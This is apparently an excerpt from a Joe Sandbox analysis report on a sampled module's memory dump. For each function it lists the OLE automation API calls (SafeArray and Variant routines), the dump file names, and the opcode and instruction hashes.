Part of subcall function 6CE43A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CE43B71
Part of subcall function 6CE43A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE43B83

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CE49D5F
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE49D72
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CE49DAF

Part of subcall function 6CE43A90: SafeArrayDestroy.OLEAUT32(?), ref: 6CE43BCF

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CE4A1BC
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE4A1CF
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CE4A20C
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEBF

Strings

A, xrefs: 6CE4AD44

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy$Element
String ID: A
API String ID: 959723449-3554254475
Opcode ID: 55a2ef915778f8d4bb3291a4cf553805445f4df928cb0728ec8aca43a32a2c92
Instruction ID: 93eacee752b434fea0424549ea9cda77aca6423a8af4457134d60ff390464d10
Opcode Fuzzy Hash: 55a2ef915778f8d4bb3291a4cf553805445f4df928cb0728ec8aca43a32a2c92
Instruction Fuzzy Hash: 9C23AE71A012049FDB00DFA8D984FDD77B9AF49308F64C198EA09AF792DB35E985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE42970 Relevance: 25.8, APIs: 17, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CE429F6
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE42A08
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CE42A2F
VariantInit.OLEAUT32(?), ref: 6CE42ABB
VariantInit.OLEAUT32(?), ref: 6CE42B3F
VariantClear.OLEAUT32(?), ref: 6CE42C04
VariantClear.OLEAUT32(?), ref: 6CE42C0B
VariantClear.OLEAUT32(?), ref: 6CE42C12
VariantClear.OLEAUT32(?), ref: 6CE42C96
VariantClear.OLEAUT32(?), ref: 6CE42C9D
VariantClear.OLEAUT32(?), ref: 6CE42CD6
VariantClear.OLEAUT32(?), ref: 6CE42CDD
VariantClear.OLEAUT32(?), ref: 6CE42CE4
SafeArrayDestroy.OLEAUT32(?), ref: 6CE42D1B
VariantClear.OLEAUT32(?), ref: 6CE42D45
VariantClear.OLEAUT32(?), ref: 6CE42D4C
VariantClear.OLEAUT32(?), ref: 6CE42D53

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$BoundInit$DestroyElement
String ID:
API String ID: 214056513-0
Opcode ID: 7d62f90ee78620bc9b045bb3d557e4f8039483a994908ada10ed2ce9fa3907a5
Instruction ID: c38189f17f43cb4acd76d181a07e86a38931657ececa28d103231a1993f7ffce
Opcode Fuzzy Hash: 7d62f90ee78620bc9b045bb3d557e4f8039483a994908ada10ed2ce9fa3907a5
Instruction Fuzzy Hash: 68C15A726083419FD700CFA8D888A5BBBF9AF99308F20895DF695C7361C775E845CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3AF30 Relevance: 24.3, APIs: 16, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CE3AF75
VariantInit.OLEAUT32(?), ref: 6CE3AF7C
VariantInit.OLEAUT32(?), ref: 6CE3AF83
VariantCopy.OLEAUT32(?,?), ref: 6CE3B00D
VariantClear.OLEAUT32(?), ref: 6CE3B027
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CE3B19C
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE3B1AA
SafeArrayAccessData.OLEAUT32(?,?), ref: 6CE3B1C5
_memmove.LIBCMT ref: 6CE3B1E6
SafeArrayUnaccessData.OLEAUT32(?), ref: 6CE3B1EF
VariantClear.OLEAUT32(?), ref: 6CE3B237
VariantClear.OLEAUT32(?), ref: 6CE3B23E
VariantClear.OLEAUT32(?), ref: 6CE3B245
VariantClear.OLEAUT32(?), ref: 6CE3B29D
VariantClear.OLEAUT32(?), ref: 6CE3B2A4
VariantClear.OLEAUT32(?), ref: 6CE3B2AB

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$Init$BoundData$AccessCopyUnaccess_memmove
String ID:
API String ID: 3403836469-0
Opcode ID: a399836df72f89a3c248dc0591eb6f81857f750059e470c65f55d33e70e8d2c3
Instruction ID: 10c877383c6a9922a3af52c0d1920ca6beb5daeb6147601846e1d81ed774832b
Opcode Fuzzy Hash: a399836df72f89a3c248dc0591eb6f81857f750059e470c65f55d33e70e8d2c3
Instruction Fuzzy Hash: ABC159B2A087419FD700DFA8C88495AB7F9FB89304F244A6DF65ACB750D731E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4D410 Relevance: 24.3, APIs: 16, Instructions: 290
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6CE4D4B3
VariantInit.OLEAUT32 ref: 6CE4D4C5
VariantInit.OLEAUT32(?), ref: 6CE4D4CC
_malloc.LIBCMT ref: 6CE4D551
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CE4D58B
SafeArrayCreateVector.OLEAUT32 ref: 6CE4D5A6
SafeArrayAccessData.OLEAUT32 ref: 6CE4D5B8

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayInitSafeVariant$CreateVector$AccessData_malloc
String ID:
API String ID: 1552365394-0
Opcode ID: 7fb0f2e47264688986dcf91117dffcaab0fcbe0a13ed60356ee4262421973b56
Instruction ID: 711edac2622201f2244fa413e547cbfdb57e21c5180d0a58a513640b6aef80e0
Opcode Fuzzy Hash: 7fb0f2e47264688986dcf91117dffcaab0fcbe0a13ed60356ee4262421973b56
Instruction Fuzzy Hash: 91B1577A6083409FD314CF68D880A5BB7F9FF89318F24895DE89987751EB34E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4D468 Relevance: 21.2, APIs: 14, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6CE4D4B3
VariantInit.OLEAUT32 ref: 6CE4D4C5
VariantInit.OLEAUT32(?), ref: 6CE4D4CC
_malloc.LIBCMT ref: 6CE4D551
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CE4D58B
SafeArrayCreateVector.OLEAUT32 ref: 6CE4D5A6
SafeArrayAccessData.OLEAUT32 ref: 6CE4D5B8
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CE4D601
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CE4D63E

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$InitVariant$CreateElementVector$AccessData_malloc
String ID:
API String ID: 2723946344-0
Opcode ID: f7661d713939b836ca5153f67b3f0e9bf33e019f99a6fd0d737e9f32997b7292
Instruction ID: ab5ed8586ae9fac197338947c9af64eb39512851e607920b08a162bc3642ec62
Opcode Fuzzy Hash: f7661d713939b836ca5153f67b3f0e9bf33e019f99a6fd0d737e9f32997b7292
Instruction Fuzzy Hash: 719157B96043019FD304CF68C880A5BB7F9FF89318F25895DE89587351DB34EA05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE45140 Relevance: 21.2, APIs: 14, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CE45177

Part of subcall function 6CE52820: _malloc.LIBCMT ref: 6CE52871

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000004), ref: 6CE451B9
SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6CE451D5
SafeArrayAccessData.OLEAUT32(00000000,00000000), ref: 6CE451E5
_memmove.LIBCMT ref: 6CE451FF
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CE45208
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CE4522C
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CE45263
VariantClear.OLEAUT32(?), ref: 6CE4526C
SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6CE452AD
VariantClear.OLEAUT32(?), ref: 6CE452B6
SafeArrayPutElement.OLEAUT32(00000000,00000002,00000002), ref: 6CE452D2
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CE4534E
VariantClear.OLEAUT32(?), ref: 6CE45358

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$ElementVariant$Clear$CreateDataVector$AccessDestroyInitUnaccess_malloc_memmove
String ID:
API String ID: 452649785-0
Opcode ID: 0faa62c11bbce55aaf6cd66af77a7ac65251c77c0627fd49943e26d17947ec97
Instruction ID: c2e3d612a6b0832f2169ac2dffb7da6f8be1b69c235fca9bf0a46d082c328923
Opcode Fuzzy Hash: 0faa62c11bbce55aaf6cd66af77a7ac65251c77c0627fd49943e26d17947ec97
Instruction Fuzzy Hash: 98713BB2A0121AEFDB00CFA5D884AAFBBB9FF59704F10815AE915D7640D774E905CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE444C0 Relevance: 19.8, APIs: 13, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CE444FF
VariantInit.OLEAUT32(?), ref: 6CE44505
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CE44516
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CE44551
VariantClear.OLEAUT32(?), ref: 6CE4455A
SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6CE44579
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CE44594
SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6CE445B5
SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6CE445CE
std::tr1::_Xweak.LIBCPMT ref: 6CE4475A
SafeArrayDestroy.OLEAUT32(?), ref: 6CE44777
VariantClear.OLEAUT32(?), ref: 6CE44787
VariantClear.OLEAUT32(?), ref: 6CE4478D

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$DestroyXweakstd::tr1::_
String ID:
API String ID: 1304965753-0
Opcode ID: 68feb8c66de042e7b981e7e8c55e10c03dd226dfdc47543f97fbcb046b546d68
Instruction ID: 5a105a3577772ec31416d90f2c2d1e99050e5d793b099bdc57382c390d2fd1c6
Opcode Fuzzy Hash: 68feb8c66de042e7b981e7e8c55e10c03dd226dfdc47543f97fbcb046b546d68
Instruction Fuzzy Hash: A7A14D76A012059FDB14DF94C984EAFB7B9FF8C714F14462DE506ABB81CA34E941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4BF00 Relevance: 18.2, APIs: 12, Instructions: 215
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CE4BF3D
VariantInit.OLEAUT32(?), ref: 6CE4BF4A
VariantInit.OLEAUT32(?), ref: 6CE4BF50
VariantInit.OLEAUT32(?), ref: 6CE4BF56
VariantInit.OLEAUT32 ref: 6CE4C04D
VariantCopy.OLEAUT32(?,?), ref: 6CE4C054
VariantInit.OLEAUT32 ref: 6CE4C085
VariantCopy.OLEAUT32(?,?), ref: 6CE4C08C
VariantClear.OLEAUT32(?), ref: 6CE4C118
VariantClear.OLEAUT32(?), ref: 6CE4C11E
VariantClear.OLEAUT32(?), ref: 6CE4C124
VariantClear.OLEAUT32(?), ref: 6CE4C12A

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$Init$Clear$Copy
String ID:
API String ID: 3833040332-0
Opcode ID: bb6869a70a930d028bba88bc5d3fe0bb2a749bd5c46c18802fa8fffb0afae4b9
Instruction ID: 47dd02d8dbed50189a41a99c2c438761e820e4b5e0df0758d27d7f178fa15563
Opcode Fuzzy Hash: bb6869a70a930d028bba88bc5d3fe0bb2a749bd5c46c18802fa8fffb0afae4b9
Instruction Fuzzy Hash: 7C818E71A01219AFDB04DFA8D880BEEBBB9FF49308F24855DE505A7740DB34A909CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CE464D0 Relevance: 18.2, APIs: 12, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6CE4650C
VariantInit.OLEAUT32(?), ref: 6CE46519
VariantInit.OLEAUT32(?), ref: 6CE46520
SafeArrayCreateVector.OLEAUT32(0000000C), ref: 6CE46531
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CE4656D
VariantClear.OLEAUT32(?), ref: 6CE46576
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CE465B6
VariantClear.OLEAUT32(?), ref: 6CE465BF
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CE46666
VariantClear.OLEAUT32(?), ref: 6CE46677
VariantClear.OLEAUT32(?), ref: 6CE4667E
VariantClear.OLEAUT32(?), ref: 6CE46685

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
String ID:
API String ID: 1625659656-0
Opcode ID: dad1715f2bd353b432bbf6aaba1497ce431b45b07a0421c95e1a3edc3210e181
Instruction ID: e5950cf646495bf260a428bfb824a48085ec0a5068e6826d0740e7f9577bd5d5
Opcode Fuzzy Hash: dad1715f2bd353b432bbf6aaba1497ce431b45b07a0421c95e1a3edc3210e181
Instruction Fuzzy Hash: 335117B22083059FC700DF68D880A5BBBF8EFD9714F108A5EF96597250DB75E906CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4CB90 Relevance: 18.1, APIs: 12, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CE4CBCA
VariantInit.OLEAUT32(?), ref: 6CE4CBD3
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CE4CBE4
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CE4CBF6
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CE4CC0D
SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6CE4CC39
VariantClear.OLEAUT32(?), ref: 6CE4CC42
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CE4CC5D
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CE4CC77
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CE4CCEC
VariantClear.OLEAUT32(?), ref: 6CE4CCFC
VariantClear.OLEAUT32(?), ref: 6CE4CD02

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$Destroy
String ID:
API String ID: 3548156019-0
Opcode ID: c3973e880cd4a3e8887ff0ced7cb56b28cba620df8a9778308696dafc6ea6fd7
Instruction ID: a8d92f82fc172cd49d7c4d9aea8b0c850417fc2a11f34245c57de0c0a2d29492
Opcode Fuzzy Hash: c3973e880cd4a3e8887ff0ced7cb56b28cba620df8a9778308696dafc6ea6fd7
Instruction Fuzzy Hash: 315133B6E00249DFDB00DFA8D884EDEBBB8FF59714F10815AE915A7741D770A905CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3A350 Relevance: 16.7, APIs: 11, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CE3A393
VariantInit.OLEAUT32(?), ref: 6CE3A39A
VariantInit.OLEAUT32(?), ref: 6CE3A3A1
VariantCopy.OLEAUT32(?,?), ref: 6CE3A3EF
VariantClear.OLEAUT32(?), ref: 6CE3A409
VariantClear.OLEAUT32(?), ref: 6CE3A50A
VariantClear.OLEAUT32(?), ref: 6CE3A511
VariantClear.OLEAUT32(?), ref: 6CE3A518
VariantClear.OLEAUT32(?), ref: 6CE3A55E
VariantClear.OLEAUT32(?), ref: 6CE3A565
VariantClear.OLEAUT32(?), ref: 6CE3A56C

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$Clear$Init$Copy
String ID:
API String ID: 3214764494-0
Opcode ID: a725b3f3a1f67b7731e107e3ba0f416ce8789de2ea636d59f1231bc5bd32d527
Instruction ID: 5d4e5977827114d258f9fff084a3bd55781c807742ab4f9091858078f4b89718
Opcode Fuzzy Hash: a725b3f3a1f67b7731e107e3ba0f416ce8789de2ea636d59f1231bc5bd32d527
Instruction Fuzzy Hash: 3F713772248341AFD700DFA9C880A5AB7F8AF89714F109A6DF659CB391D730E945CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6CE466A0 Relevance: 15.2, APIs: 10, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

